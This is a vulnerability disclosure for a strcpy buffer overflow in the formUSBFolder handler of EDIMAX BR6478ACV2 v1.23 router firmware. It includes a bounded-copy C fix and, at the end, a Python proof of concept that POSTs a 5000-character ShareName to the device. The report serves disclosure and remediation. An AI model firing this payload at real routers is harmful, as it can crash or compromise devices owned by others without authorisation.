Overview

Affected version

BR6478ACV2_v1.23

Vulnerability details

The EDIMAX BR6478ACV2_v1.23 firmware has a buffer overflow vulnerability in the formUSBFolder function. The variables v4 and v5 receive the ShareName and SelectName parameters from a POST request. Because the user fully controls these inputs, the statement strcpy(&v19[17], v4); copies request data with no bounds check and can cause a buffer overflow.
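
A bounded replacement for the strcpy(&v19[17], v4); pattern described above, as an added example that is not the vendor's code or part of the original report. The helper name copy_share_name and the sizes RECORD_SIZE and NAME_ROOM are assumptions, since the page does not state the real size of v19.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed sizes: the report does not give the real size of v19, so
 * RECORD_SIZE is a constructed value. NAME_OFFSET mirrors &v19[17]. */
#define RECORD_SIZE 64
#define NAME_OFFSET 17
#define NAME_ROOM   (RECORD_SIZE - NAME_OFFSET)

/* Hypothetical helper: copy a request parameter into the record at the
 * fixed offset. Returns 0 on success, -1 if the value is missing or does
 * not fit together with its terminating NUL. Nothing is written on
 * failure, so the handler can reject the request instead of truncating. */
int copy_share_name(char record[RECORD_SIZE], const char *param)
{
    const char *nul;
    size_t len;

    if (record == NULL || param == NULL)
        return -1;

    /* memchr stops at the first NUL and never scans past NAME_ROOM bytes. */
    nul = memchr(param, '\0', NAME_ROOM);
    if (nul == NULL)
        return -1;              /* too long: no room for the terminator */

    len = (size_t)(nul - param);
    memcpy(record + NAME_OFFSET, param, len + 1);   /* +1 copies the NUL */
    return 0;
}

int main(void)
{
    char record[RECORD_SIZE] = {0};
    char oversized[5001];       /* constructed input, same length as the POC */

    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    printf("short name:     %d\n", copy_share_name(record, "media"));
    printf("oversized name: %d\n", copy_share_name(record, oversized));
    return 0;
}
```

The same length check applies to the SelectName value held in v5.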


POC

import requests

ip = "192.168.2.1"

data = {
    "addFolder":     "1",
    "ShareName":     "A"*5000,
}
url = f'http://{ip}/goform/formUSBFolder'

res = requests.post(url=url, data=data, verify=False)
print(res)
